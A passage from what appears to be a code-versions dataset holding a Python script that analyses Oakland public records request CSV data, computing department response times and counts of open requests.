webContentBytes = response.read()\n webContent = webContentBytes.decode('utf-8')\n if webContent.find('pdf') != -1:\n print('here')\n npdf += 1\n else:\n continue\n if i % 100 == 0:\n print(i, npdf, nempty)\n outs.close()\n print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty))\n\n\ndef loadPRRQuery(inf):\n reader = csv.DictReader(open(inf))\n prrIDList = []\n for i, entry in enumerate(reader):\n prrIDList.append(entry['PRRId'].strip())\n return prrIDList\n\n\ndef rptQry(qryList, outf):\n outs = open(outf, 'w')\n outs.write('PRID,CreateDate,DaysOpen,Status\\n')\n runDate = datetime.datetime.today()\n for prrID in qryList:\n prr = prr20Recent[prrID]\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n outs.write('%s,%s,%d,%s\\n' % (prrID, prr['createDate'].date(),\n openDays, prr['status']))\n outs.close()\n\n\nif __name__ == '__main__':\n dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'\n startDate = datetime.datetime(2017, 1, 1)\n csvFile = dataDir + 'requests-2020-07-01-sdoran.csv'\n prr20Recent, deptTbl = bldIndexTblCSV(csvFile, startDate)\n openPRRFile = dataDir + 'openPRR_200831.csv'\n rptOpenPRR(prr20Recent, openPRRFile)\n deptFreqFile = dataDir + 'deptFreq2.csv'\n rptDeptFreq(prr20Recent, deptTbl, startDate, deptFreqFile)\n createDateFile = dataDir + 'createDate_200831.csv'\n anlyzCreateDates(prr20Recent, createDateFile)\n clearDateDir = dataDir + 'deptClear_200831/'\n anlyzClearDates(prr20Recent, deptTbl, startDate, clearDateDir)\n openOPDFile = dataDir + 'openOPD_200831.csv'\n rptOpenPRR(prr20Recent, openOPDFile)\n", "step-4": "<mask token>\nPRRDateFmt = '%Y-%m-%dT%H:%M:%S'\nPRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f'\nDateTypes = {'date_received': 'recdDate', 'date_created': 'createDate',\n 'status_updated': 'statusUpDate'}\n\n\ndef freqHist3(tbl):\n \"\"\"python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t\"\"\"\n from functools import cmp_to_key\n\n def cmpd1(a, b):\n \"\"\"decreasing order of frequencies\"\"\"\n return b[1] - a[1]\n flist = list(tbl.items())\n flist.sort(key=cmp_to_key(cmpd1))\n return flist\n\n\nAllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date',\n 'Point of Contact', 'Request Date', 'Status', 'URL', 'Visibility',\n 'Closed Date', 'Closure Reasons', 'Departments', 'Format Received',\n 'Staff Time (hrs:minutes)', 'Staff Time (minutes)', 'Tags',\n 'Embargo Ends On Date', 'Staff Cost', 'Date First Contact',\n 'First Contact Event', 'Compliance', 'Anticipated Fulfillment Date',\n 'Expiration Date', 'Requester City', 'Requester State',\n 'Requester Zipcode', 'Requester Company']\nDeptNorm = {'Admin: Planning, Building & Neighborhood Preserv':\n 'Admin: Building Inspection', 'Budget and Fiscal':\n 'Budget and Revenue - Revenue Division',\n 'City Attorney Administration Unit': 'City Attorney',\n 'City Auditor Unit': 'City Auditor', 'City Clerk Unit': 'City Clerk',\n 'Oakland Police Department': 'Police Department',\n 'Contracts and Compliance': 'Contracts Compliance',\n 'Transportation Services - Administration':\n 'Department of Transportation', 'Fire': 'Fire Department',\n 'Human Resources Management': 'Human Resources',\n 'Information Technology (IT)': 'Information Technology',\n 'Public Works Agency': 'Public Works'}\nCSVDTFormat = '%m/%d/%Y %H:%M:%S %p'\n\n\ndef bldIndexTblCSV(inf, startDate=None):\n \"\"\"return prrIDTbl, deptTbl\n\t\"\"\"\n prrTbl = {}\n deptTbl = defaultdict(list)\n statusTbl = defaultdict(int)\n ncloseDate = 0\n nolder = 0\n nmultDept = 0\n deptSepChar = b'\\xef\\xbf\\xbd'\n reader = csv.DictReader(open(inf, encoding='utf8', errors='replace'))\n for i, entry in enumerate(reader):\n prr = {}\n prrID = entry['Id']\n createDateStr = entry['Created At'].strip()\n prr['createDate'] = datetime.datetime.strptime(createDateStr,\n CSVDTFormat) if createDateStr != '' else None\n if prr['createDate'] == None or startDate != None and prr['createDate'\n ] < startDate:\n nolder += 1\n continue\n deptStr = entry['Departments'].strip()\n if deptStr.find(';') == -1:\n deptList = [deptStr]\n else:\n nmultDept += 1\n deptList = [dept.strip() for dept in deptStr.split(';')]\n deptList2 = []\n for dept in deptList:\n ndept = DeptNorm[dept] if dept in DeptNorm else dept\n if ndept != '':\n deptList2.append(ndept)\n deptTbl[ndept].append(prrID)\n prr['dept'] = deptList2\n closeDateStr = entry['Closed Date'].strip()\n prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat\n ) if closeDateStr != '' else None\n prr['status'] = entry['Status'].strip()\n prr['text'] = entry['Request Text'].strip()\n prr['closeReason'] = entry['Closure Reasons'].strip()\n prr['URL'] = entry['URL'].strip()\n statusTbl[prr['status']] += 1\n if prr['closeDate'] != None:\n ncloseDate += 1\n prrTbl[prrID] = prr\n print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % (\n len(prrTbl), len(deptTbl), nmultDept, ncloseDate))\n if startDate != None:\n print('bldIndexTblCSV: NOld dropped=%d' % nolder)\n freqList = freqHist3(statusTbl)\n print('Status,Freq')\n for status, freq in freqList:\n print('\"%s\",%d' % (status, freq))\n return prrTbl, deptTbl\n\n\ndef compHistAvg(hist):\n \"\"\"compute first moment\n\tASSUME hist: value -> freq \n\t\"\"\"\n sum = n = 0\n for v in hist.keys():\n n += hist[v]\n sum += v * hist[v]\n return n, float(sum) / n\n\n\ndef compMedian(hist):\n \"\"\"compute MEDIAN value\n\tASSUME hist: value -> freq \n\t\"\"\"\n if len(hist) == 1:\n return hist[0]\n sum = n = 0\n vn = {}\n for v in sorted(hist.keys()):\n n += hist[v]\n sum += v * hist[v]\n vn[v] = n\n half = float(n / 2.0)\n for v in sorted(hist.keys()):\n if vn[v] > half:\n return v\n\n\ndef anlyzCreateDates(prrIDTbl, outf):\n \"\"\"distribution of create dates\n\t\"\"\"\n dateDist = defaultdict(int)\n nmissdate = 0\n for prrID, prr in prrIDTbl.items():\n cdateFnd = prr['createDate']\n if cdateFnd == None:\n nmissdate += 1\n continue\n mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n dateDist[mkey] += 1\n print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate))\n allMon = list(dateDist.keys())\n allMon.sort()\n outs = open(outf, 'w')\n outs.write('Month,Freq\\n')\n for mkey in allMon:\n outs.write('%s,%d\\n' % (mkey, dateDist[mkey]))\n outs.close()\n\n\ndef normDeptName(dept):\n return re.sub('\\\\W', '_', dept.upper())\n\n\ndef anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10):\n \"\"\"Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t\"\"\"\n allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) >\n minDeptFreq]\n allDept.sort()\n nonOPDresp = defaultdict(lambda : defaultdict(int))\n nonOPDopen = defaultdict(int)\n print('\\n# Dept,NOld,NMissRecd,NMissClose')\n missCloseDetails = defaultdict(lambda : defaultdict(list))\n for dept in allDept:\n responseMon = defaultdict(lambda : defaultdict(int))\n openReqMon = defaultdict(int)\n nmissRecd = 0\n nmissClose = 0\n nolder = 0\n for prrID in deptTbl[dept]:\n prr = prrIDTbl[prrID]\n recdDateTime = prr['createDate']\n if recdDateTime == None:\n nmissRecd += 1\n continue\n if recdDateTime < startDate:\n nolder += 1\n continue\n try:\n recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month\n )\n except Exception as e:\n print('huh')\n if prr['status'] == 'Closed':\n closeDate = prr['closeDate']\n if closeDate == None:\n nmissClose += 1\n missCloseDetails[dept][recdMonKey].append(prrID)\n continue\n respDelay = closeDate - recdDateTime\n delayDays = respDelay.days\n responseMon[recdMonKey][delayDays] += 1\n if dept != 'Police Department':\n nonOPDresp[recdMonKey][delayDays] += 1\n else:\n openReqMon[recdMonKey] += 1\n if dept != 'Police Department':\n nonOPDopen[recdMonKey] += 1\n print('\"%s\",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose))\n allMonth = list(responseMon.keys())\n allMonth.sort()\n normDept = normDeptName(dept)\n outf = outdir + normDept + '-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,NClose,NOpen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(responseMon[recdMonKey])\n medianDelay = compMedian(responseMon[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, openReqMon[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n allMonth = list(nonOPDresp.keys())\n allMonth.sort()\n outf = outdir + 'NonOPD-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,N,NOPen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n medianDelay = compMedian(nonOPDresp[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, nonOPDopen[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n outf = outdir + 'missClose.csv'\n outs = open(outf, 'w')\n allDateSet = set()\n for dept in missCloseDetails.keys():\n allDateSet.update(missCloseDetails[dept].keys())\n allDates = sorted(list(allDateSet))\n hdr = 'Dept'\n for date in allDates:\n hdr += ',%s' % (date,)\n outs.write(hdr + '\\n')\n for dept in sorted(missCloseDetails.keys()):\n line = dept\n for date in allDates:\n if date in missCloseDetails[dept]:\n line += ',%d' % (len(missCloseDetails[dept][date]),)\n else:\n line += ', '\n outs.write(line + '\\n')\n outs.close()\n\n\ndef rptDeptFreq(prrTbl, deptTbl, startDate, outf):\n outs = open(outf, 'w')\n outs.write('Dept,Freq\\n')\n for dept in sorted(deptTbl.keys()):\n nrecent = 0\n for prrIdx in deptTbl[dept]:\n prr = prrTbl[prrIdx]\n if prr['createDate'] >= startDate:\n nrecent += 1\n outs.write('%s,%d\\n' % (dept, nrecent))\n outs.close()\n\n\ndef rptOpenPRR(prrTbl, outf):\n daysOpen = defaultdict(lambda : defaultdict(list))\n runDate = datetime.datetime.today()\n for prrID in prrTbl.keys():\n prr = prrTbl[prrID]\n opdP = 'Police Department' in prr['dept']\n if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr[\n 'status'] == 'Due soon':\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n openYears = openDays // 365\n if openYears == 0:\n dkey = openDays\n else:\n dkey = 1000 + openYears\n daysOpen[opdP][dkey].append(prrID)\n outs = open(outf, 'w')\n outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\\n')\n allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys()))\n allNDay = sorted(list(allNDaySet))\n for nday in allNDay:\n if nday > 365:\n lbl = '> %d year' % (nday - 1000)\n else:\n lbl = '%d' % nday\n opdList = daysOpen[1][nday] if nday in daysOpen[1] else []\n nonList = daysOpen[0][nday] if nday in daysOpen[0] else []\n outs.write('%s,%d,%d,\"%s\",\"%s\"\\n' % (lbl, len(opdList), len(nonList\n ), opdList, nonList))\n outs.close()\n\n\ndef getWebPages(prrTbl, outf):\n outs = open(outf, 'w')\n outs.write('PRRID,OPD,Text\\n')\n nempty = 0\n npdf = 0\n for i, prrID in enumerate(sorted(prrTbl.keys())):\n prr = prrTbl[prrID]\n if prr['URL'] == '':\n nempty += 1\n continue\n opdP = 'Police Department' in prr['dept']\n url = prr['URL']\n response = urllib.request.urlopen(url)\n webContentBytes = response.read()\n webContent = webContentBytes.decode('utf-8')\n if webContent.find('pdf') != -1:\n print('here')\n npdf += 1\n else:\n continue\n if i % 100 == 0:\n print(i, npdf, nempty)\n outs.close()\n print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty))\n\n\ndef loadPRRQuery(inf):\n reader = csv.DictReader(open(inf))\n prrIDList = []\n for i, entry in enumerate(reader):\n prrIDList.append(entry['PRRId'].strip())\n return prrIDList\n\n\ndef rptQry(qryList, outf):\n outs = open(outf, 'w')\n outs.write('PRID,CreateDate,DaysOpen,Status\\n')\n runDate = datetime.datetime.today()\n for prrID in qryList:\n prr = prr20Recent[prrID]\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n outs.write('%s,%s,%d,%s\\n' % (prrID, prr['createDate'].date(),\n openDays, prr['status']))\n outs.close()\n\n\nif __name__ == '__main__':\n dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'\n startDate = datetime.datetime(2017, 1, 1)\n csvFile = dataDir + 'requests-2020-07-01-sdoran.csv'\n prr20Recent, deptTbl = bldIndexTblCSV(csvFile, startDate)\n openPRRFile = dataDir + 'openPRR_200831.csv'\n rptOpenPRR(prr20Recent, openPRRFile)\n deptFreqFile = dataDir + 'deptFreq2.csv'\n rptDeptFreq(prr20Recent, deptTbl, startDate, deptFreqFile)\n createDateFile = dataDir + 'createDate_200831.csv'\n anlyzCreateDates(prr20Recent, createDateFile)\n clearDateDir = dataDir + 'deptClear_200831/'\n anlyzClearDates(prr20Recent, deptTbl, startDate, clearDateDir)\n openOPDFile = dataDir + 'openOPD_200831.csv'\n rptOpenPRR(prr20Recent, openOPDFile)\n", "step-5": "'''harvestPRR: analyze Public Record Requests from CSV data provided by NextRequest\n\nCreated 27 Aug 20\n\n@author: rik@electronicArtifacts.com\n'''\n\nfrom collections import defaultdict\nimport csv\nimport datetime\nimport json\nimport random\nimport re\nimport requests\nimport sys\nimport time\nimport urllib\n\nimport re\n\n\nPRRDateFmt = '%Y-%m-%dT%H:%M:%S'\nPRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f'\n\nDateTypes = {'date_received': 'recdDate',\n\t\t\t'date_created': 'createDate',\n\t\t\t'status_updated': 'statusUpDate'}\n\ndef freqHist3(tbl):\n\t'''python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t'''\n\t\n\tfrom functools import cmp_to_key\n\tdef cmpd1(a,b):\n\t\t\"decreasing order of frequencies\"\n\t\treturn b[1] - a[1]\n\n\t\n\tflist = list(tbl.items()) #python3\n\tflist.sort(key=cmp_to_key(cmpd1))\n\treturn flist\n\nAllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date', 'Point of Contact', 'Request Date',\n\t\t\t'Status', 'URL', 'Visibility', 'Closed Date', 'Closure Reasons',\n\t\t\t'Departments', 'Format Received', 'Staff Time (hrs:minutes)',\n\t\t\t'Staff Time (minutes)', 'Tags', 'Embargo Ends On Date',\n\t\t\t'Staff Cost', 'Date First Contact', 'First Contact Event',\n\t\t\t'Compliance', 'Anticipated Fulfillment Date', 'Expiration Date',\n\t\t\t'Requester City', 'Requester State', 'Requester Zipcode', 'Requester Company']\n\nDeptNorm = {\"Admin: Planning, Building & Neighborhood Preserv\": \"Admin: Building Inspection\",\n\t\t\t\"Budget and Fiscal\": \"Budget and Revenue - Revenue Division\",\n\t\t\t\"City Attorney Administration Unit\": \"City Attorney\",\n\t\t\t\"City Auditor Unit\": \"City Auditor\",\n\t\t\t\"City Clerk Unit\": \"City Clerk\",\n\t\t\t\"Oakland Police Department\": \"Police Department\",\n\t\t\t\"Contracts and Compliance\": \"Contracts Compliance\",\n\t\t\t\"Transportation Services - Administration\": \"Department of Transportation\",\n\t\t\t\"Fire\": \"Fire Department\",\n\t\t\t\"Human Resources Management\": \"Human Resources\",\n\t\t\t\"Information Technology (IT)\": \"Information Technology\",\n\t\t\t\"Public Works Agency\": \"Public Works\"}\n\nCSVDTFormat = '%m/%d/%Y %H:%M:%S %p'\n# 07/01/2020 09:54:53 AM\n\ndef bldIndexTblCSV(inf,startDate=None):\n\t'''return prrIDTbl, deptTbl\n\t'''\n\n\tprrTbl = {}\n\tdeptTbl = defaultdict(list) # keep list of all prrIDs\n\tstatusTbl = defaultdict(int)\n\tncloseDate = 0\n\tnolder = 0\n\tnmultDept = 0\n\tdeptSepChar = b'\\xef\\xbf\\xbd' # only used in Finance\n\t\n\treader = csv.DictReader(open(inf,encoding = \"utf8\",errors='replace'))\n\tfor i,entry in enumerate(reader):\n\t\tprr = {}\n\t\tprrID = entry['Id']\n\t\t\n\t\tcreateDateStr = entry['Created At'].strip()\n\t\tprr['createDate'] = datetime.datetime.strptime(createDateStr,CSVDTFormat) if createDateStr != '' else None\n\n\t\tif prr['createDate'] == None or \\\n\t\t\t(startDate != None and prr['createDate'] < startDate):\n\t\t\tnolder += 1\n\t\t\tcontinue\n\t\t\n\t\tdeptStr = entry['Departments'].strip()\n\t\t# NB: multiple department separated by semi-colon\n\t\tif deptStr.find(';') == -1:\n\t\t\tdeptList = [deptStr]\n\t\telse:\n\t\t\tnmultDept += 1\n\t\t\tdeptList = [dept.strip() for dept in deptStr.split(';')]\n\t\t\t\n\t\tdeptList2 = []\n\t\tfor dept in deptList:\n\t\t\tndept = DeptNorm[dept] if dept in DeptNorm else dept\n\t\t\tif ndept != '':\n\t\t\t\tdeptList2.append(ndept)\n\t\t\t\tdeptTbl[ndept].append(prrID)\n\t\tprr['dept'] = deptList2\n\t\t\t\n\t\tcloseDateStr = entry['Closed Date'].strip()\n\t\tprr['closeDate'] = datetime.datetime.strptime(closeDateStr,CSVDTFormat) if closeDateStr != '' else None\n\t\tprr['status'] = entry['Status'].strip()\n\t\tprr['text'] = entry['Request Text'].strip()\n\t\tprr['closeReason'] = entry['Closure Reasons'].strip()\n\t\tprr['URL'] = entry['URL'].strip()\n\t\t\n\t\t\n\t\tstatusTbl[ prr['status'] ] += 1\n\t\tif prr['closeDate'] != None:\n\t\t\tncloseDate += 1\n\t\t\t\n\t\tprrTbl[prrID] = prr\n\t\t\n\tprint('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % \\\n\t\t(len(prrTbl),len(deptTbl),nmultDept,ncloseDate))\n\tif startDate != None:\n\t\tprint('bldIndexTblCSV: NOld dropped=%d' % (nolder))\n\n# \tfreqList = freqHist3(deptTbl)\n# \tprint('Dept,Freq')\n# \tfor dept,freq in freqList:\n# \t\tprint('\"%s\",%d' % (dept,freq))\n\n\tfreqList = freqHist3(statusTbl)\n\tprint('Status,Freq')\n\tfor status,freq in freqList:\n\t\tprint('\"%s\",%d' % (status,freq))\n\t\n\t\n\treturn (prrTbl, deptTbl)\n\t\t\ndef compHistAvg(hist):\n\t'''compute first moment\n\tASSUME hist: value -> freq \n\t'''\n\tsum = n = 0\n\tfor v in hist.keys():\n\t\tn += hist[v]\n\t\tsum += v * hist[v]\n\t\t\n\treturn n,float(sum) / n\n\ndef compMedian(hist):\n\t'''compute MEDIAN value\n\tASSUME hist: value -> freq \n\t'''\n\n\t# only singletons thwart the search for half-way point\n\tif len(hist) == 1:\n\t\treturn hist[0]\n\t\n\tsum = n = 0\n\tvn = {}\n\tfor v in sorted(hist.keys()):\n\t\tn += hist[v]\n\t\tsum += v * hist[v]\n\t\tvn[v] = n\n\t\t\n\thalf = float(n/2.)\n\tfor v in sorted(hist.keys()):\n\t\tif vn[v] > half:\n\t\t\treturn v\t\n\ndef anlyzCreateDates(prrIDTbl,outf):\n\t'''distribution of create dates\n\t'''\n\t\n\tdateDist = defaultdict(int)\n\tnmissdate = 0\n\tfor prrID,prr in prrIDTbl.items():\n\t\t# 180204\n# \t\tfor dtype in DateTypes.values():\n# \t\t\tif dtype in prr:\n# \t\t\t\tif cdateFnd == None:\n# \t\t\t\t\tcdateFnd = prr[dtype]\n# \t\t\t\telse:\n# \t\t\t\t\tif prr[dtype] != cdateFnd:\n# \t\t\t\t\t\tcdateFnd = min([cdateFnd,prr[dtype]])\n\n\t\tcdateFnd = prr['createDate']\n\t\t\t\t\t\t\n\t\tif cdateFnd== None:\n\t\t\tnmissdate += 1\n\t\t\tcontinue\n\t\tmkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n\t\tdateDist[mkey] += 1\n\t\t\n\tprint('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl),nmissdate))\n\tallMon = list(dateDist.keys())\n\tallMon.sort()\n\touts = open(outf,'w')\n\touts.write('Month,Freq\\n')\n\tfor mkey in allMon:\n\t\touts.write('%s,%d\\n' % (mkey,dateDist[mkey]))\n\touts.close()\t\t\n\ndef normDeptName(dept):\n\treturn re.sub('\\W','_',dept.upper())\n\t\ndef anlyzClearDates(prrIDTbl,deptTbl,startDate,outdir,minDeptFreq=10):\n\t'''Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t'''\n\t\n\tallDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq ]\n\tallDept.sort()\n\n\tnonOPDresp = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq\n\tnonOPDopen = defaultdict(int) # month -> freq\n\t\n\tprint('\\n# Dept,NOld,NMissRecd,NMissClose')\n\tmissCloseDetails = defaultdict(lambda: defaultdict(list)) # dept -> recd -> [prrID]\n\t\n\tfor dept in allDept:\n\t\tresponseMon = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq\n\t\topenReqMon = defaultdict(int) # month -> freq\n\t\t\n\t\tnmissRecd = 0\n\t\tnmissClose = 0\n\t\tnolder = 0\n\t\tfor prrID in deptTbl[dept]:\n\t\t\tprr = prrIDTbl[prrID]\n\t\t\t# 180228\n\t\t\t# recdDateTime = prr['recdDate']\n\t\t\trecdDateTime = prr['createDate']\n\n\t\t\tif recdDateTime==None:\n\t\t\t\tnmissRecd += 1\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif recdDateTime < startDate:\n\t\t\t\tnolder += 1\n\t\t\t\tcontinue\n\t\t\ttry:\n\t\t\t\trecdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month)\n\t\t\texcept Exception as e:\n\t\t\t\tprint('huh')\n\t\t\n\t\t\tif prr['status'] == 'Closed':\n\t\t\t\t# 180228\n\t\t\t\t# closeDate = prr['statusUpDate']\n\t\t\t\tcloseDate = prr['closeDate']\n\t\t\t\tif closeDate==None:\n\t\t\t\t\tnmissClose += 1\n\t\t\t\t\tmissCloseDetails[dept][recdMonKey].append(prrID)\n\t\t\t\t\tcontinue\n\n\t\t\t\trespDelay = closeDate - recdDateTime\n\t\t\t\tdelayDays = respDelay.days\n\t\t\t\tresponseMon[recdMonKey][delayDays] += 1\n\t\t\t\t\n\t\t\t\t# NB: was 'Oakland Police Deparment' in 180204\n\t\t\t\tif dept != 'Police Department':\n\t\t\t\t\tnonOPDresp[recdMonKey][delayDays] += 1\n\t\t\t\n\t\t\telse:\n\t\t\t\topenReqMon[recdMonKey] += 1\n\t\t\n\t\t\t\t# NB: was 'Oakland Police Deparment' in 180204\n\t\t\t\tif dept != 'Police Department':\n\t\t\t\t\tnonOPDopen[recdMonKey] += 1\n\t\t\n\t\tprint('\"%s\",%d,%d,%d' % (dept,nolder,nmissRecd,nmissClose))\n\t\t\t\t\n\t\tallMonth = list(responseMon.keys())\n\t\tallMonth.sort()\n\t\t\n\t\tnormDept = normDeptName(dept)\n\t\t\n\t\toutf = outdir + normDept + '-RT.csv'\n\t\touts = open(outf,'w')\t\t\n\t\touts.write('Month,NClose,NOpen,Avg,Median\\n')\n\t\tfor recdMonKey in allMonth:\n\t\t\tnreq,avgDelay = compHistAvg(responseMon[recdMonKey])\n\t\t\tmedianDelay = compMedian(responseMon[recdMonKey])\n\t\t\touts.write('%s,%d,%d,%f,%d\\n' % (recdMonKey,nreq,openReqMon[recdMonKey],avgDelay,medianDelay))\n\t\touts.close()\n\t\t\n# \t\toutf = outdir + normDept + '-nopen.csv'\n# \t\touts = open(outf,'w')\t\t\n# \t\touts.write('Month,NOpen\\n')\n# \t\tfor recdMonKey in allMonth:\n# \t\t\touts.write('%s,%d\\n' % (recdMonKey,openReqMon[recdMonKey]))\n# \t\touts.close()\n\t\t\n\tallMonth = list(nonOPDresp.keys())\n\tallMonth.sort()\n\n\toutf = outdir + 'NonOPD-RT.csv'\n\touts = open(outf,'w')\t\t\n\t\n\touts.write('Month,N,NOPen,Avg,Median\\n')\n\tfor recdMonKey in allMonth:\n\t\tnreq,avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n\t\tmedianDelay = compMedian(nonOPDresp[recdMonKey])\n\t\touts.write('%s,%d,%d,%f,%d\\n' % (recdMonKey,nreq,nonOPDopen[recdMonKey],avgDelay,medianDelay))\n\touts.close()\n\t\n# \toutf = outdir + 'NonOPD-NOpen.csv'\n# \touts = open(outf,'w')\t\t\n# \touts.write('Month,NOpen\\n')\n# \tfor recdMonKey in allMonth:\n# \t\touts.write('%s,%d\\n' % (recdMonKey,nonOPDopen[recdMonKey]))\n# \touts.close()\n\t\n\toutf = outdir + 'missClose.csv'\n\touts = open(outf,'w')\n\t# missCloseDetails: dept -> recd -> freq\n\t\n\tallDateSet = set()\n\tfor dept in missCloseDetails.keys():\n\t\tallDateSet.update(missCloseDetails[dept].keys())\n\tallDates = sorted(list(allDateSet))\n\t\n\thdr = 'Dept'\n\tfor date in allDates:\n\t\thdr += ',%s' % (date,)\n\touts.write(hdr+'\\n')\n\t\n\tfor dept in sorted(missCloseDetails.keys()):\n\t\tline = dept\n\t\tfor date in allDates:\n\t\t\tif date in missCloseDetails[dept]:\n\t\t\t\tline += ',%d' % (len(missCloseDetails[dept][date]),)\n\t\t\telse:\n\t\t\t\tline += ', '\n\t\touts.write(line+'\\n')\n\touts.close()\n\t\n\t\t\ndef rptDeptFreq(prrTbl, deptTbl,startDate,outf):\n\t\n\t# freq = defaultdict(int)\n\touts = open(outf,'w')\n\touts.write('Dept,Freq\\n')\n\t\n\tfor dept in sorted(deptTbl.keys()):\n\t\tnrecent = 0\n\t\tfor prrIdx in deptTbl[dept]:\n\t\t\tprr = prrTbl[prrIdx]\n\t\t\tif prr['createDate'] >= startDate:\n\t\t\t\tnrecent += 1\n\t\touts.write('%s,%d\\n' % (dept,nrecent))\n\t\n\touts.close()\n\ndef rptOpenPRR(prrTbl,outf):\n\t\n\tdaysOpen = defaultdict(lambda: defaultdict(list)) # ndays -> OPD/non -> [prrID]\n\trunDate = datetime.datetime.today()\n\t\n\tfor prrID in prrTbl.keys():\n\t\tprr = prrTbl[prrID]\n\t\topdP = 'Police Department' in prr['dept']\n\n\t\tif prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr['status'] == 'Due soon':\n\t\t\trecdDateTime = prr['createDate']\n\t\t\topenPeriod = runDate - recdDateTime\n\t\t\topenDays = openPeriod.days\n\t\t\t# NB: capture integer dividend\n\t\t\topenYears = openDays // 365\n\t\t\tif openYears == 0:\n\t\t\t\tdkey = openDays\n\t\t\telse:\n\t\t\t\tdkey = 1000 + openYears\n\t\t\tdaysOpen[opdP][dkey].append(prrID)\t\t\t\n\t\t\n\touts = open(outf,'w')\n\touts.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\\n')\n\tallNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys()))\n\tallNDay = sorted(list(allNDaySet))\n\tfor nday in allNDay:\n\t\tif nday > 365:\n\t\t\tlbl = '> %d year' % (nday-1000)\n\t\telse:\n\t\t\tlbl = '%d' % nday\n\t\topdList = daysOpen[1][nday] if nday in daysOpen[1] else []\n\t\tnonList = daysOpen[0][nday] if nday in daysOpen[0] else []\n\t\t\t\n\t\touts.write('%s,%d,%d,\"%s\",\"%s\"\\n' % (lbl,len(opdList),len(nonList), opdList,nonList))\n\t\t\n\touts.close()\n\ndef getWebPages(prrTbl,outf):\n\t\n\touts = open(outf,'w')\n\touts.write('PRRID,OPD,Text\\n')\n\tnempty = 0\n\tnpdf = 0\n\tfor i,prrID in enumerate(sorted(prrTbl.keys())):\n\n\t\tprr = prrTbl[prrID]\n\t\tif prr['URL'] == '':\n\t\t\tnempty += 1\n\t\t\tcontinue\n\t\t\t\n\t\topdP = 'Police Department' in prr['dept']\n\t\t\n\t\turl = prr['URL']\n\t\tresponse = urllib.request.urlopen(url)\n\t\twebContentBytes = response.read()\n\t\twebContent = webContentBytes.decode(\"utf-8\")\n\t\tif webContent.find('pdf') != -1:\n\t\t\tprint('here')\n\t\t\tnpdf += 1\n\t\telse:\n\t\t\tcontinue\n\t\n\t\tif i % 100 == 0:\n\t\t\tprint(i,npdf,nempty)\n\t\t\t\n\t\t# outs.write('%s,%d,\"%s\"\\n' % (prrID,opdP,prr['text']))\n\touts.close()\n\tprint('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl),nempty))\n\ndef loadPRRQuery(inf):\n\t\n\treader = csv.DictReader(open(inf))\n\tprrIDList = []\n\tfor i,entry in enumerate(reader):\n\t\t# Exhibit,PRRId\n\t\tprrIDList.append(entry['PRRId'].strip())\n\treturn prrIDList\n\t\t\ndef rptQry(qryList,outf):\n\touts = open(outf,'w')\n\touts.write('PRID,CreateDate,DaysOpen,Status\\n')\n\t\n\trunDate = datetime.datetime.today()\n\tfor prrID in qryList:\n\t\tprr = prr20Recent[prrID]\n\t\trecdDateTime = prr['createDate']\n\t\topenPeriod = runDate - recdDateTime\n\t\topenDays = openPeriod.days\n\t\touts.write('%s,%s,%d,%s\\n' % (prrID,prr['createDate'].date(),openDays,prr['status']))\n\t\t\n\touts.close()\n\t\n\t\nif __name__ == '__main__':\n\n\tdataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'\n\t\n\n\tstartDate = datetime.datetime(2017,1,1)\n\t\n\tcsvFile = dataDir + 'requests-2020-07-01-sdoran.csv'\n\t# prr20, deptTbl = 